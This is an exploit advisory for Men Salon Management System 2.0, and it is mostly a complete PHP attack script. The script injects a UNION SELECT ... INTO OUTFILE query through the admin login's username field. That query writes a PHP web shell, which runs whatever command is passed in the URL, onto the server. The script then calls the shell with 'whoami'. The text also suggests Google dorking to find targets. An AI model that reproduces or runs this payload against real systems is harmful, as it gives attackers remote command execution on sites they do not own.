Headline
Men Salon Management System 2.0 PHP Code Injection
Men Salon Management System version 2.0 suffers from a php code injection vulnerability.
=============================================================================================================================================| # Title : Men Salon Management System 2.0 php code injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) || # Vendor : https://phpgurukul.com/men-salon-management-system-using-php-and-mysql/ |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a back door.[+] Line 16 + 19 Set your Target.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php[+] payload :<?php// المكتبات المطلوبةfunction send_request($url, $data) { $options = [ 'http' => [ 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", 'method' => 'POST', 'content' => http_build_query($data), ] ]; $context = stream_context_create($options); return file_get_contents($url, false, $context);}// تحديد URL ثابت$url = 'http://localhost/msms/';// مسار ثابت لرفع الملف$path = 'C:\www\msms\uploaded.php';$path = str_replace("\\", "\\\\", $path);// حمولة الباب الخلفي$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';// إرسال ملف PHP يحتوي على الباب الخلفي$payload = [ 'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a", 'password' => 'test', 'login' => ''];send_request($url . "admin/index.php", $payload);echo "[+] PHP backdoor uploaded successfully at $path\n";// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي$response = file_get_contents($url . "uploaded.php?cmd=whoami");echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================